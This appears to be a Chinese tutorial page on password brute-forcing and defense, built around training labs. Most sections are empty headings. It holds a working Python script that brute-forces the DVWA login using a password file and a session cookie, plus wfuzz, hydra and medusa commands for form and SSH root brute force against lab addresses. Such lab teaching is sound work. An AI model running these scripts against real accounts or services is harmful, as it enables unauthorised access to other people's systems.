密码暴力破解与防御
密码安全概述






暴力破解实战
python暴力破解





bp暴力破解

















防御手段



其他暴力破解工具










Last updated









































Last updated
# -*- coding: utf-8 -*-
# python 3
import requests
# 如果第一个密码就提示成功,是 PHPSESSID 没有替换的问题
pwds = open("password.txt")
for pwd in pwds:
url = "http://127.0.0.1/dvwa/vulnerabilities/brute/"
# PHPSESSID务必替换为登录以后的PHPSESSID
#根据f12抓包的参数填写对应参数,并且要把cookie复制到对应的headers头部中。
resp = requests.get(url = url, params = {"username":"admin", "password":pwd.strip(), "Login":"Login"}, headers = {"Cookie":"security=low; PHPSESSID=aj0lre9888q49m70icps95dl63"})
if 'Username and/or password incorrect.' in resp.text:
print('破解失败:'+pwd, end='')
else:
print('破解成功:'+pwd, end='')
break;
pwds.close()
-z指定文件名 -d指定参数是使用post传参。
wfuzz -z file,user -z file,pass -d "username=FUZZ&password=FUZ2Z&submit=login" http://192.168.15.1/pikachu/vul/burteforce/bf_form.php-L 参数指定一个用户名字典文件,-P 参数指定一个密码字典文件
hydra -L user -P pass 192.168.15.50 ssh-M 参数用于指定目标服务的协议类型,-h 参数指定目标主机的 IP 地址,-u 参数指定要测试的用户名,-P 参数指定密码字典文件
medusa -M ssh -h 192.168.15.50 -u root -P pass